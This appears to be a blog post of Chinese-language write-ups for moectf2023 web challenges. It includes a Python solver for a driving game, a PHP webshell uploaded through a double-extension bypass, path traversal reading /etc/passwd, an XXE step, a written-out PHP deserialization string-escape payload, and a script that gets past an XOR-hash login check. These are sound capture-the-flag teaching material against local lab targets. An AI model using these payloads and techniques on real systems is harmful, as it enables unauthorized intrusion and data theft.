moectf2023 web wp

gas!gas!gas!

直接跑脚本

import requests

session=requests.Session()
url="http://127.0.0.1:14447"
steering_control=0
throttle=1
for i in range(10):
    datas={"driver":1,"steering_control":steering_control,"throttle":throttle}
    print(datas)
    data=session.post(url,data=datas)
    try:
        re=data.text.split('<font color="red">')[1].split("</font>")[0]
    except:
        print(data.text)
    if re.find("右")>-1:
        steering_control=-1
    if re.find("直行")>-1:
        steering_control=0
    if re.find("左")>-1:
        steering_control=1
    if re.find("小")>-1:
        throttle=0
    if re.find("保持")>-1:
        throttle=1
    if re.find("大")>-1:
        throttle=2
    print(re)

moe图床

先随机上传一个带有一句话木马的png文件image-20250104154216743

查看前端代码image-20250104154243520

发现有个upload.php

image-20250104154328716

它只取第一个后缀,那我们可以试着构造1.png.phpimage-20250104154520334

然后蚁剑连接

image-20250104154546302

meo图床

先上传一张图片,发现image-20250104160540989

调用了name参数,来存放文件。尝试是不是文件穿越

image-20250104160641540

发现能读取/etc/passwd

尝试读取/flag

image-20250104160720736

发现了突破口

image-20250104160800572

image-20250104161030273

大海捞针

/?id=1进行id爆破

image-20250104180835884

了解你的座驾

先抓包

image-20250105105352404

URL解码得到xml_content=XDU moeCTF Flag

可以判断为XXE漏洞

image-20250105105448898

再进行URL编码image-20250105105524886

moectf{DO-Y0u-lIk3-the_xXE_VUlHuB-phP-tO_Get_Flag_@fTEr_G@Sgasgas0}

夺命十三枪

发现require_once('Hanxin.exe.php'); 直接/Hanxin.exe.php

根据代码审计,我们需要把$Spear_Owner = 'Nobody';改成MaoLei

同时我们已经知道了目前的payload是O:34:"Omg_It_Is_So_Cool_Bring_Me_My_Flag":2:{s:5:"Chant";s:15:"夺命十三枪";s:11:"Spear_Owner";s:6:"Nobody";}

image-20250105211304515

发现str_replace 猜测为字符串逃逸 逃逸部分为";s:11:"Spear_Owner";s:6:"MaoLei";}

image-20250105211349182

所以payload=

?chant=di_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiangdi_qi_qiang";s:11:"Spear_Owner";s:6:"MaoLei";}

moectf{PhP_UnsErI@1_coDE-I5_w3LC0me-@Nd_yOU-shoU1D_eScAPe_from_the_filter0}

signin

assert users["admin"] == "admin"
users中存在用户名“admin”密码也为“admin”,表面上看需要传入的参数也为admin/admin。

image-20250105223913189

继续分析源码可以发现eval()语句将base64.b64encode覆写为base64.b64decode

def gethash(*items):
    c = 0
    for item in items:
        if item is None:
            continue
        c ^= int.from_bytes(hashlib.md5(f"{salt}[{item}]{salt}".encode()).digest(), "big") # it looks so complex! but is it safe enough?
    return hex(c)[2:]
#当传入的参数items为2个时该函数等价于求两个参数的异或值并返回,所以当两个参数相等时不管该参数为何值,返回值都为0
#而传入参数有两个过滤,username不能等于“admin”,且username不能等于password,而拿到flag需要hashed值为0,怎么才能做到呢?

而传入参数有两个过滤,username不能等于“admin”,且username不能等于password,而拿到flag需要hashed值为0,怎么才能做到呢?

接下来编写脚本即可把构造的json数据base64编码五次

import requests
import base64

url = "http://localhost:64817/login"
username = "\"1\""
password = "1"
jsondata = "{\"username\":"+f"{username}"+",\"password\":"+f"{password}"+"}"
print(f"{jsondata = }")
for _ in range(5):
    jsondata = base64.b64encode(str(jsondata).encode()).decode()
data = "{\"params\":\""+f"{jsondata}\""+"}"
print(f"{data = }")
req = requests.post(url=url,data=data).text
print(f"{req = }")
posted @ 2025-01-08 10:09  dynasty_chenzi  阅读(61)  评论(1)    收藏  举报
返回顶端